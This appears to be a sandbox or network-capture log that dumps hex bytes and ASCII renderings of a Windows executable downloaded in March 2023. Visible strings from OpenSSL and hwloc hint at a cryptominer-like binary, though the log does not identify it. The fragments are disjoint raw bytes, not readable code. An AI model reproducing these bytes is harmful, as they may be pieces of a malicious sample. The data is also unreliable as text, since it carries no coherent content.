                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7025INData Raw: f0 aa ff 16 e6 e4 fe 31 b4 52 ff 3d 52 2b 00 6e f5 d9 00 c7 7d 3d 00 2e fd 34 00 8d c5 db 00 d3 9f c1 00 37 79 69 fe b7 14 81 00 a9 77 aa ff cb b2 8b ff 87 28 b6 ff ac 0d ca ff 41 b2 94 00 08 cf 2b 00 7a 35 7f 01 4a a1 30 00 e3 d6 80 fe 56 0b f3 ff 64 56 07 01 f5 44 86 ff 3d 2b 15 01 98 54 5e ff be 3c fa fe ef 76 e8 ff d6 88 25 01 71 4c 6b ff 5d 68 64 01 90 ce 17 ff 6e 96 9a 01 e4 67 b9 00 da 31 32 fe 87 4d 8b ff b9 01 4e 00 00 a1 94 ff 61 1d e9 ff cf 94 95 ff a0 a8 00 00 5b 80 ab ff 06 1c 13 fe 0b 6f f7 00 27 bb 96 ff 8a e8 95 00 75 3e 44 ff 3f d8 bc ff eb ea 20 fe 1d 39 a0 ff 19 0c f1 01 a9 3c bf 00 20 83 8d ff ed 9f 7b ff 5e c5 5e fe 74 fe 03 ff 5c b3 61 fe 79 61 5c ff aa 70 0e 00 15 95 f8 00 f8 e3 03 00 50 60 6d 00 4b c0 4a 01 0c 5a e2 ff a1 6a 44 01
                                                                                                                                                                                                                    Data Ascii: 1R=R+n}=.47yiw(A+z5J0VdVD=+T^<v%qLk]hdng12MNa[o'u>D? 9< {^^t\aya\pP`mKJZjD
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7041INData Raw: 3d f7 06 61 6a d9 0e 24 f3 83 01 60 68 fc 07 ce d7 9d 03 a1 3d 65 05 42 f6 64 0d af d0 57 0f c7 37 e0 03 f2 bc e2 06 a0 77 34 06 e6 67 ac 07 bb 7d 72 01 2e fe fa 0e f5 89 95 04 54 3d 81 0e f2 fe c0 0f 0d b5 7f 08 d0 a5 ba 08 c7 57 b4 09 9d b5 4f 02 4c 3e 22 00 06 4e 7d 0a 80 fd 55 05 1b 8d 11 0c 2a f2 32 07 6c 21 2e 08 04 95 08 03 99 a2 d2 0c 3d e1 a3 06 83 8e 63 03 29 47 9b 08 ee 55 d8 00 91 0c 81 04 7d 5b ec 08 fd cd 65 0d f7 51 bf 01 7d a9 16 0a af cd 14 0d e7 10 cd 0f 60 8e c3 02 bd ef 93 03 6e 44 27 0a dd 1f a7 06 94 d8 b5 00 2f 8f 12 0e cd f2 3d 06 88 18 9b 06 95 67 c8 06 2d 73 5d 02 49 fc 9f 05 6f b6 f2 05 f9 96 ce 0e 7b a2 13 08 52 79 ce 0e 9e 48 2e 09 65 c3 6f 02 66 0f de 02 1a 7d 15 07 df 6d d8 01 11 dc 59 07 0f bb 80 07 e5 81 28 01 96 94 d2 0a
                                                                                                                                                                                                                    Data Ascii: =aj$`h=eBdW7w4g}r.T=WOL>"N}U*2l!.=c)GU}[eQ}`nD'/=g-s]Io{RyH.eof}mY(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7057INData Raw: 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 00 01 00 00 00 10 00 00 00 08 00 00 00 0b 00 00 00 00 00 00 00 90 e5 30 40 01 00 00 00 d0 e5 30 40 01 00 00 00 00 00 00 00 00 00 00 00 84 00 00 00 00 00 00 00 e0 2a 1f 40 01 00 00 00 60 28 1f 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 00 00 00 08 00 00 00 10 00 00 00 08 00 00 00 0a 00 00 00 00 00 00 00 90 e5 30 40 01 00 00 00 80 e4 30 40 01 00 00 00 00 00 00 00 00 00 00 00 84 00 00 00 00 00 00 00 e0 2a 1f 40 01 00 00 00 60 28 1f 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 04 00 00 01 00 00 00 10 00 00 00 10 00 00 00 05 00 00 00 00 00 00 00 a0 e8 30 40 01 00 00 00 00 ec 30 40 01 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
                                                                                                                                                                                                                    Data Ascii: n0@0@*@`(@l0@0@*@`(@s0@0@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7073INData Raw: 00 43 45 52 54 49 46 49 43 41 54 45 00 58 35 30 39 20 43 45 52 54 49 46 49 43 41 54 45 00 54 52 55 53 54 45 44 20 43 45 52 54 49 46 49 43 41 54 45 00 58 35 30 39 20 43 52 4c 00 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 00 44 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 00 45 43 20 50 52 49 56 41 54 45 20 4b 45 59 00 00 63 72 79 70 74 6f 2f 70 65 6d 2f 70 65 6d 5f 70 6b 38 2e 63 00 45 4e 43 52 59 50 54 45 44 20 50 52 49 56 41 54 45 20 4b 45 59 00 50 52 49 56 41 54 45 20 4b 45 59 00 00 00 00 00 00 00 00 00 00 63 72 79 70 74 6f 2f 70 6b 63 73 31 32 2f 70 31 32 5f 63 72 70 74 2e 63 00 00 00 00 00 00 00 00 63 72 79 70 74 6f 2f 70 6b 63 73 31 32 2f 70 31 32 5f 64 65 63 72 2e 63 00 00 00 00 00 00 00 00 63 72 79 70 74 6f 2f 70 6b 63 73 31 32 2f 70 31 32 5f 6b 65
                                                                                                                                                                                                                    Data Ascii: CERTIFICATEX509 CERTIFICATETRUSTED CERTIFICATEX509 CRLRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYcrypto/pem/pem_pk8.cENCRYPTED PRIVATE KEYPRIVATE KEYcrypto/pkcs12/p12_crpt.ccrypto/pkcs12/p12_decr.ccrypto/pkcs12/p12_ke
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7089INData Raw: 00 00 00 6f 73 73 6c 5f 73 74 6f 72 65 5f 72 65 67 69 73 74 65 72 5f 6c 6f 61 64 65 72 5f 69 6e 74 00 4f 53 53 4c 5f 53 54 4f 52 45 5f 53 45 41 52 43 48 5f 62 79 5f 61 6c 69 61 73 00 00 00 00 00 00 00 4f 53 53 4c 5f 53 54 4f 52 45 5f 53 45 41 52 43 48 5f 62 79 5f 69 73 73 75 65 72 5f 73 65 72 69 61 6c 00 00 00 00 00 00 4f 53 53 4c 5f 53 54 4f 52 45 5f 53 45 41 52 43 48 5f 62 79 5f 6b 65 79 5f 66 69 6e 67 65 72 70 72 69 6e 74 00 4f 53 53 4c 5f 53 54 4f 52 45 5f 53 45 41 52 43 48 5f 62 79 5f 6e 61 6d 65 00 00 6f 73 73 6c 5f 73 74 6f 72 65 5f 75 6e 72 65 67 69 73 74 65 72 5f 6c 6f 61 64 65 72 5f 69 6e 74 00 74 72 79 5f 64 65 63 6f 64 65 5f 70 61 72 61 6d 73 00 74 72 79 5f 64 65 63 6f 64 65 5f 50 4b 43 53 31 32 00 74 72 79 5f 64 65 63 6f 64 65 5f 50 4b 43 53
                                                                                                                                                                                                                    Data Ascii: ossl_store_register_loader_intOSSL_STORE_SEARCH_by_aliasOSSL_STORE_SEARCH_by_issuer_serialOSSL_STORE_SEARCH_by_key_fingerprintOSSL_STORE_SEARCH_by_nameossl_store_unregister_loader_inttry_decode_paramstry_decode_PKCS12try_decode_PKCS
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7105INData Raw: 6c 69 64 20 6d 75 6c 74 69 70 6c 65 20 72 64 6e 73 00 69 6e 76 61 6c 69 64 20 6e 61 6d 65 00 69 6e 76 61 6c 69 64 20 6e 75 6c 6c 20 61 72 67 75 6d 65 6e 74 00 69 6e 76 61 6c 69 64 20 6e 75 6c 6c 20 6e 61 6d 65 00 69 6e 76 61 6c 69 64 20 6e 75 6c 6c 20 76 61 6c 75 65 00 69 6e 76 61 6c 69 64 20 6e 75 6d 62 65 72 00 69 6e 76 61 6c 69 64 20 6e 75 6d 62 65 72 73 00 69 6e 76 61 6c 69 64 20 6f 62 6a 65 63 74 20 69 64 65 6e 74 69 66 69 65 72 00 69 6e 76 61 6c 69 64 20 6f 70 74 69 6f 6e 00 69 6e 76 61 6c 69 64 20 70 6f 6c 69 63 79 20 69 64 65 6e 74 69 66 69 65 72 00 69 6e 76 61 6c 69 64 20 70 72 6f 78 79 20 70 6f 6c 69 63 79 20 73 65 74 74 69 6e 67 00 69 6e 76 61 6c 69 64 20 70 75 72 70 6f 73 65 00 69 6e 76 61 6c 69 64 20 73 61 66 69 00 69 6e 76 61 6c 69 64 20 73
                                                                                                                                                                                                                    Data Ascii: lid multiple rdnsinvalid nameinvalid null argumentinvalid null nameinvalid null valueinvalid numberinvalid numbersinvalid object identifierinvalid optioninvalid policy identifierinvalid proxy policy settinginvalid purposeinvalid safiinvalid s
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7121INData Raw: 1d e7 99 d6 89 3e 80 25 c8 66 52 78 c9 4c 2e 6a b3 10 9c ba 0e 15 c6 78 ea e2 94 53 3c fc a5 f4 2d 0a 1e a7 4e f7 f2 3d 2b 1d 36 0f 26 39 19 60 79 c2 19 08 a7 23 52 b6 12 13 f7 6e fe ad eb 66 1f c3 ea 95 45 bc e3 83 c8 7b a6 d1 37 7f b1 28 ff 8c 01 ef dd 32 c3 a5 5a 6c be 85 21 58 65 02 98 ab 68 0f a5 ce ee 3b 95 2f db ad 7d ef 2a 84 2f 6e 5b 28 b6 21 15 70 61 07 29 75 47 dd ec 10 15 9f 61 30 a8 cc 13 96 bd 61 eb 1e fe 34 03 cf 63 03 aa 90 5c 73 b5 39 a2 70 4c 0b 9e 9e d5 14 de aa cb bc 86 cc ee a7 2c 62 60 ab 5c ab 9c 6e 84 f3 b2 af 1e 8b 64 ca f0 bd 19 b9 69 23 a0 50 bb 5a 65 32 5a 68 40 b3 b4 2a 3c d5 e9 9e 31 f7 b8 21 c0 19 0b 54 9b 99 a0 5f 87 7e 99 f7 95 a8 7d 3d 62 9a 88 37 f8 77 2d e3 97 5f 93 ed 11 81 12 68 16 29 88 35 0e d6 1f e6 c7 a1 df de 96
                                                                                                                                                                                                                    Data Ascii: >%fRxL.jxS<-N=+6&9`y#RnfE{7(2Zl!Xeh;/}*/n[(!pa)uGa0a4c\s9pL,b`\ndi#PZe2Zh@*<1!T_~}=b7w-_h)5
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7137INData Raw: 3f e8 77 69 92 92 79 7b 9f fa 24 5b c8 13 e1 83 00 c4 ac 25 35 50 d7 5f 61 ea f7 54 31 14 62 63 4b 55 0d 21 11 68 5d 59 c3 66 c8 73 cf 63 3d c0 34 e2 ce 87 7e d8 d4 21 2b 67 5c 81 61 1f 07 7f 62 f7 39 84 30 1e 36 3b 57 eb e4 a4 64 2f 60 9c cd 3a d6 35 46 bc 1b 2d 03 81 9e 0c f5 01 27 b4 7a 84 99 79 df e3 a0 8c f3 6c ba 94 30 84 10 5e a9 37 25 fe 6f 6f f4 1f 3b ff a1 6a fb 8c 20 74 8c 45 8f 27 a2 e0 d9 34 3a c7 4e 69 4f 88 fc df e8 4d 3e 88 00 0e ef 8d 64 59 35 8c 38 45 8a 66 43 80 1d fd 9b 1d 72 bb 84 86 a5 33 63 25 e8 12 82 4e 84 98 80 8d 12 b4 3f d3 fe e1 0a 28 ce a5 9b e1 27 52 c2 a6 d5 bd 54 97 e4 dd 55 d6 c5 64 70 66 eb 4d 0b 84 77 01 a8 b6 a1 a9 26 db 84 14 67 b5 e0 b7 43 f0 21 60 58 d0 e5 84 30 f0 54 72 f4 6f 06 53 a1 1a a3 55 47 dc da bf 5d 62 b5
                                                                                                                                                                                                                    Data Ascii: ?wiy{$[%5P_aT1bcKU!h]Yfsc=4~!+g\ab906;Wd/`:5F-'zyl0^7%oo;j tE'4:NiOM>dY58EfCr3c%N?('RTUdpfMw&gC!`X0TroSUG]b
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7153INData Raw: 00 00 00 f2 66 6f 40 01 00 00 00 69 00 00 0a 00 00 00 00 04 67 6f 40 01 00 00 00 71 00 00 0a 00 00 00 00 1d 67 6f 40 01 00 00 00 6e 00 00 0a 00 00 00 00 30 67 6f 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 53 41 70 61 72 61 6d 73 5f 70 72 69 6e 74 00 44 53 41 70 61 72 61 6d 73 5f 70 72 69 6e 74 5f 66 70 00 64 73 61 5f 62 75 69 6c 74 69 6e 5f 70 61 72 61 6d 67 65 6e 00 64 73 61 5f 62 75 69 6c 74 69 6e 5f 70 61 72 61 6d 67 65 6e 32 00 44 53 41 5f 64 6f 5f 73 69 67 6e 00 44 53 41 5f 64 6f 5f 76 65 72 69 66 79 00 44 53 41 5f 6d 65 74 68 5f 64 75 70 00 44 53 41 5f 6d 65 74 68 5f 6e 65 77 00 44 53 41 5f 6d 65 74 68 5f 73 65 74 31 5f 6e 61 6d 65 00 44 53 41 5f 6e 65 77 5f 6d 65 74 68 6f 64 00 64 73 61 5f 70 61 72 61 6d 5f 64 65 63 6f 64 65
                                                                                                                                                                                                                    Data Ascii: fo@igo@qgo@n0go@DSAparams_printDSAparams_print_fpdsa_builtin_paramgendsa_builtin_paramgen2DSA_do_signDSA_do_verifyDSA_meth_dupDSA_meth_newDSA_meth_set1_nameDSA_new_methoddsa_param_decode
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7169INData Raw: 00 00 00 94 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 7c a7 6f 40 01 00 00 00 d0 57 34 40 01 00 00 00 98 00 00 00 00 00 00 00 90 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 88 a7 6f 40 01 00 00 00 b0 57 34 40 01 00 00 00 99 00 00 00 00 00 00 00 90 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 88 a7 6f 40 01 00 00 00 b0 57 34 40 01 00 00 00 9a 00 00 00 00 00 00 00 90 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 88 a7 6f 40 01 00 00 00 b0 57 34 40 01 00 00 00 76 61 6c 75 65 2e 6f 74 68 65 72 00 00 00 00 00 90 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 90 a8 6f 40 01 00 00 00 c0 ff 19 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a6 6f 40 01 00 00 00 80 04 1a 40 01 00 00 00 00 01 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 d0 a5 6f 40
                                                                                                                                                                                                                    Data Ascii: |o@W4@o@W4@o@W4@o@W4@value.othero@@o@@o@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7185INData Raw: f3 c6 ff ce f3 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 94 f5 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 4f f3 c6 ff 3d f4 c6 ff 94 f5 c6 ff 94 f5 c6 ff 94 f5 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3d f4 c6 ff 3c e5 c6 ff 43 00 4f 00 4e 00 4f 00 55 00 54 00 24 00 00 00 1b 5b 32 34 7e 00 1b 5b 32 34 5e 00 1b 5b 32 34 24 00 1b 5b 32 34 40 00 1b 5b 32 33 7e 00 1b 5b 32 33 5e 00 1b 5b 32 33 24 00 1b 5b 32 33 40 00 1b 5b 32 31 7e 00 1b 5b 32 31 5e 00
                                                                                                                                                                                                                    Data Ascii: =================================O====<CONOUT$[24~[24^[24$[24@[23~[23^[23$[23@[21~[21^
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7201INData Raw: 72 20 64 69 73 63 6f 76 65 72 79 20 63 6f 6d 70 6f 6e 65 6e 74 20 77 69 74 68 20 72 65 73 65 72 76 65 64 20 6e 61 6d 65 20 60 73 74 6f 70 27 0a 00 2c 00 68 77 6c 6f 63 3a 20 43 61 6e 6e 6f 74 20 72 65 67 69 73 74 65 72 20 64 69 73 63 6f 76 65 72 79 20 63 6f 6d 70 6f 6e 65 6e 74 20 77 69 74 68 20 6e 61 6d 65 20 60 25 73 27 20 63 6f 6e 74 61 69 6e 69 6e 67 20 72 65 73 65 72 76 65 64 20 63 68 61 72 61 63 74 65 72 73 20 60 25 63 2c 27 0a 00 68 77 6c 6f 63 3a 20 43 61 6e 6e 6f 74 20 72 65 67 69 73 74 65 72 20 64 69 73 63 6f 76 65 72 79 20 63 6f 6d 70 6f 6e 65 6e 74 20 60 25 73 27 20 77 69 74 68 20 69 6e 76 61 6c 69 64 20 70 68 61 73 65 73 20 30 78 25 78 0a 00 00 00 00 00 00 00 68 77 6c 6f 63 3a 20 44 72 6f 70 70 69 6e 67 20 70 72 65 76 69 6f 75 73 6c 79 20 72
                                                                                                                                                                                                                    Data Ascii: r discovery component with reserved name `stop',hwloc: Cannot register discovery component with name `%s' containing reserved characters `%c,'hwloc: Cannot register discovery component `%s' with invalid phases 0x%xhwloc: Dropping previously r
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7217INData Raw: 58 50 4f 52 54 5f 53 55 50 50 4f 52 54 00 30 00 6e 6f 72 6d 61 6c 00 21 73 74 72 6e 63 6d 70 28 6e 61 6d 65 2c 20 22 6e 6f 72 6d 61 6c 22 2c 20 36 29 00 2d 61 6e 6f 6e 00 21 73 74 72 63 6d 70 28 6e 61 6d 65 2b 36 2c 20 22 2d 61 6e 6f 6e 22 29 00 00 21 74 6f 70 6f 6c 6f 67 79 2d 3e 75 73 65 72 64 61 74 61 5f 6e 6f 74 5f 64 65 63 6f 64 65 64 00 72 65 74 20 3d 3d 20 28 69 6e 74 29 20 65 6e 63 6f 64 65 64 5f 6c 65 6e 67 74 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 68 60 40 01 00 00 00 78 6d 6c 00 00 00 00 00 00 00 00 00 00 40 8f 40 00 00 7a 44 6f 12 83 3a 77 be 7f 3f 00 00 00 3f 00 00 00 5f 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: XPORT_SUPPORT0normal!strncmp(name, "normal", 6)-anon!strcmp(name+6, "-anon")!topology->userdata_not_decodedret == (int) encoded_lengthh`@xml@@zDo:w??_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7233INData Raw: 00 00 00 c0 fa 1d 0b 00 00 00 00 c0 fd 1f 0b 00 00 00 00 40 fe 21 0b 00 00 00 00 c0 fa 23 0b 00 00 00 00 40 f7 25 0b 00 00 00 00 40 fd 27 0b 00 00 00 00 c0 ff 29 0b 00 00 00 00 40 f1 2b 0b 00 00 00 00 40 f8 2d 0b 00 00 00 00 c0 f9 2f 0b 00 00 00 00 40 fd 31 0b 00 00 00 00 c0 ff 33 0b 00 00 00 00 40 fb 35 0b 00 00 00 00 c0 fb 37 0b 00 00 00 00 c0 fb 39 0b 00 00 00 00 40 ff 3b 0b 00 00 00 00 c0 f4 3d 0b 00 00 00 00 c0 ff 3f 0b 00 00 00 00 40 fe 41 0b 00 00 00 00 c0 fd 43 0b 00 00 00 00 40 fe 45 0b 00 00 00 00 c0 f4 47 0b 00 00 00 00 40 f6 49 0b 00 00 00 00 40 f8 4b 0b 00 00 00 00 40 ff 4d 0b 00 00 00 00 c0 fe 4f 0b 00 00 00 00 c0 ff 51 0b 00 00 00 00 40 ff 53 0b 00 00 00 00 c0 f5 55 0b 00 00 00 00 40 fa 57 0b 00 00 00 00 40 ff 59 0b 00 00 00 00 40 fd 5b 0b
                                                                                                                                                                                                                    Data Ascii: @!#@%@')@+@-/@13@579@;=?@AC@EG@I@K@MOQ@SU@W@Y@[
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7249INData Raw: 00 00 00 80 f8 7f c7 02 00 00 00 80 f8 ff c7 02 00 00 00 80 eb 7f c8 02 00 00 00 80 f1 ff c8 02 00 00 00 80 ff 7f c9 02 00 00 00 80 f1 ff c9 02 00 00 00 80 fe 7f ca 02 00 00 00 80 fb ff ca 02 00 00 00 80 f4 7f cb 02 00 00 00 80 fe ff cb 02 00 00 00 80 ff 7f cc 02 00 00 00 80 df ff cc 02 00 00 00 80 fe 7f cd 02 00 00 00 80 f8 ff cd 02 00 00 00 80 ff 7f ce 02 00 00 00 80 ee ff ce 02 00 00 00 80 fe 7f cf 02 00 00 00 80 fc ff cf 02 00 00 00 80 fe 7f d0 02 00 00 00 80 f9 ff d0 02 00 00 00 80 fa 7f d1 02 00 00 00 80 f5 ff d1 02 00 00 00 80 f0 7f d2 02 00 00 00 80 f7 ff d2 02 00 00 00 80 fb 7f d3 02 00 00 00 80 fb ff d3 02 00 00 00 80 fa 7f d4 02 00 00 00 80 fe ff d4 02 00 00 00 80 ea 7f d5 02 00 00 00 80 f4 ff d5 02 00 00 00 80 f2 7f d6 02 00 00 00 80 f8 ff d6
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7265INData Raw: d6 2a 2a 76 dd 90 90 16 95 88 88 03 c9 46 46 95 bc ee ee d6 05 b8 b8 50 6c 14 14 55 2c de de 63 81 5e 5e 2c 31 0b 0b 41 37 db db ad 96 e0 e0 c8 9e 32 32 e8 a6 3a 3a 28 36 0a 0a 3f e4 49 49 18 12 06 06 90 fc 24 24 6b 8f 5c 5c 25 78 c2 c2 61 0f d3 d3 86 69 ac ac 93 35 62 62 72 da 91 91 62 c6 95 95 bd 8a e4 e4 ff 74 79 79 b1 83 e7 e7 0d 4e c8 c8 dc 85 37 37 af 18 6d 6d 02 8e 8d 8d 79 1d d5 d5 23 f1 4e 4e 92 72 a9 a9 ab 1f 6c 6c 43 b9 56 56 fd fa f4 f4 85 a0 ea ea 8f 20 65 65 f3 7d 7a 7a 8e 67 ae ae 20 38 08 08 de 0b ba ba fb 73 78 78 94 fb 25 25 b8 ca 2e 2e 70 54 1c 1c ae 5f a6 a6 e6 21 b4 b4 35 64 c6 c6 8d ae e8 e8 59 25 dd dd cb 57 74 74 7c 5d 1f 1f 37 ea 4b 4b c2 1e bd bd 1a 9c 8b 8b 1e 9b 8a 8a db 4b 70 70 f8 ba 3e 3e e2 26 b5 b5 83 29 66 66 3b e3 48 48
                                                                                                                                                                                                                    Data Ascii: **vFFPlU,c^^,1A722::(6?II$$k\\%xai5bbrbtyyN77mmy#NNrllCVV ee}zzg 8sxx%%..pT_!5dY%Wtt|]7KKKpp>>&)ff;HH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7281INData Raw: dc 59 6e da 18 c2 b7 c2 af b7 da 01 8e 8f 8c 8f 02 8c 01 b1 1d ac 64 ac 79 64 b1 9c f1 6d d2 6d 23 d2 9c 49 72 3b e0 3b 92 e0 49 d8 1f c7 b4 c7 ab b4 d8 ac b9 15 fa 15 43 fa ac f3 fa 09 07 09 fd 07 f3 cf a0 6f 25 6f 85 25 cf ca 20 ea af ea 8f af ca f4 7d 89 8e 89 f3 8e f4 47 67 20 e9 20 8e e9 47 10 38 28 18 28 20 18 10 6f 0b 64 d5 64 de d5 6f f0 73 83 88 83 fb 88 f0 4a fb b1 6f b1 94 6f 4a 5c ca 96 72 96 b8 72 5c 38 54 6c 24 6c 70 24 38 57 5f 08 f1 08 ae f1 57 73 21 52 c7 52 e6 c7 73 97 64 f3 51 f3 35 51 97 cb ae 65 23 65 8d 23 cb a1 25 84 7c 84 59 7c a1 e8 57 bf 9c bf cb 9c e8 3e 5d 63 21 63 7c 21 3e 96 ea 7c dd 7c 37 dd 96 61 1e 7f dc 7f c2 dc 61 0d 9c 91 86 91 1a 86 0d 0f 9b 94 85 94 1e 85 0f e0 4b ab 90 ab db 90 e0 7c ba c6 42 c6 f8 42 7c 71 26 57 c4
                                                                                                                                                                                                                    Data Ascii: Yndydmm#Ir;;ICo%o% }Gg G8(( oddosJooJ\rr\8Tl$lp$8W_Ws!RRsdQ5Qe#e#%|Y|W>]c!c|!>||7aaK|BB|q&W
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7297INData Raw: d2 f1 50 49 72 eb 33 18 28 21 84 00 00 13 23 00 00 81 5c 00 00 95 86 f0 01 b7 19 d5 8d c6 0b 15 cc 92 72 99 41 e1 81 da c4 ad d5 00 00 f9 c8 00 00 3f 47 00 00 37 bc 5e 01 c5 f3 28 24 a0 c8 14 b4 9f 3b aa bd 4e 3d e6 57 fb 62 00 00 c9 8b 00 00 3f ca 00 00 88 da f2 01 6d 1e 56 18 a0 76 9f bc 0a 6d 91 c9 87 3a da 44 2a 0f 00 00 1e 63 00 00 32 d9 00 00 10 13 5b 01 dd ce fb 3b ef e4 81 a2 69 4f 41 fa 8d 88 18 a8 a6 5e 00 00 f4 88 00 00 8c c2 00 00 b2 29 f5 01 af 24 06 92 89 27 80 da 64 06 72 06 22 34 24 3b f0 e9 00 00 23 60 00 00 81 d1 00 00 2a e0 5c 01 1f f4 ab b1 c6 b5 9e c4 07 24 a2 35 28 86 e6 d7 7c b8 00 00 2e 20 00 00 32 54 00 00 af 75 f7 01 75 23 85 07 ef 5a 0a aa fc 19 7a 8e 44 8f 24 bb 77 33 00 00 7f 58 00 00 8b 74 00 00 0c f5 51 01 d7 50 36 00 b0 ae
                                                                                                                                                                                                                    Data Ascii: PIr3(!#\rA?G7^($;N=Wb?mVvm:D*c2[;iOA^)$'dr"4$;#`*\$5(|. 2Tuu#ZzD$w3XtQP6
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7313INData Raw: 99 37 80 36 52 9e 27 14 af 29 91 00 00 98 ff 00 00 02 db 00 00 02 8a 60 c0 28 e0 43 6d e3 1c 5d cf 75 01 f9 82 0b dd 4c f2 79 9d 00 00 0c 66 00 00 cc 50 00 00 af 49 00 de 43 ec 31 74 ea e4 28 29 90 18 82 54 0b 0f 83 e7 73 46 00 00 5d 0f 00 00 21 82 00 00 80 cf a0 c0 a5 01 72 6b 8e 27 c4 99 98 c3 e5 7c eb 16 d3 43 de cb 00 00 e1 70 00 00 a4 45 00 00 78 a4 20 dc 1e de b8 42 e6 07 6b cf da 42 2a ac 7e ec 8b 1e 8e c7 00 00 75 e9 00 00 6a ce 00 00 d5 67 40 c2 75 d2 ca 5b ef ff 1e 29 3f 5b 51 7a 7e 3e 44 0b 84 1c 00 00 c9 96 00 00 ef 09 00 00 2d 0c c0 de ce 0d 00 72 87 df b1 7f 7d da 9e aa eb c4 1c 56 d4 10 00 00 b0 19 00 00 49 97 00 00 57 22 80 c2 f8 33 fb 5d 82 c4 87 7f d2 99 4d 84 9e f5 db ba 23 4a 00 00 13 d7 00 00 75 d6 00 00 b4 d7 60 d8 b1 ff ab 2f 93 6a
                                                                                                                                                                                                                    Data Ascii: 76R')`(Cm]uLyfPIC1t()TsF]!rk'|CpEx BkB*~ujg@u[)?[Qz~>D-r}VIW"3]M#Ju`/j
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC7329INData Raw: 0c 16 bb d7 93 d6 cd 2f 6c 29 19 00 00 25 dd 00 00 90 84 6a 00 da 92 00 00 bc 9c d8 5a 1b 28 0d be 4a 6c ab 9d bb 93 55 d6 66 25 00 00 ff 7f 00 00 07 d0 75 00 d2 c3 00 38 0d f2 c2 60 d9 98 f3 33 bb c2 b8 6d a5 61 9e 15 6d 23 00 00 7f c0 00 00 e2 af 6a 00 57 da 00 18 dd 33 1d 74 d0 0d dd 01 33 a4 82 99 19 12 f3 e0 13 3b 00 00 e6 3a 00 00 0b 7b 74 00 6c f3 00 18 07 9b db 12 25 5a fe b3 6f 73 fe 97 74 4c 89 5a 5c 07 00 00 3c 98 00 00 9c 2f 6b 00 64 a2 00 20 b6 f5 c1 28 e7 ea 00 3e 9e dd ed 67 6a be 42 99 57 01 00 00 a5 62 00 00 75 fb 75 00 5f 8b 00 20 6c 5d 07 4e 12 bd 23 8c c2 0a 91 69 07 e0 38 23 18 3d 00 00 66 85 00 00 ee 04 6b 00 e9 ea 00 38 d7 5a 04 06 2c cf d0 81 e7 15 c4 63 c8 3f e4 af 22 1f 00 00 6a 85 00 00 0f f6 60 00 a5 72 00 00 c5 df 65 12 02 b3
                                                                                                                                                                                                                    Data Ascii: /l)%jZ(JlUf%u8`3mam#jW3t3;:{tl%ZostLZ\</kd (>gjBWbuu_ l]N#i8#=fk8Z,c?"j`re
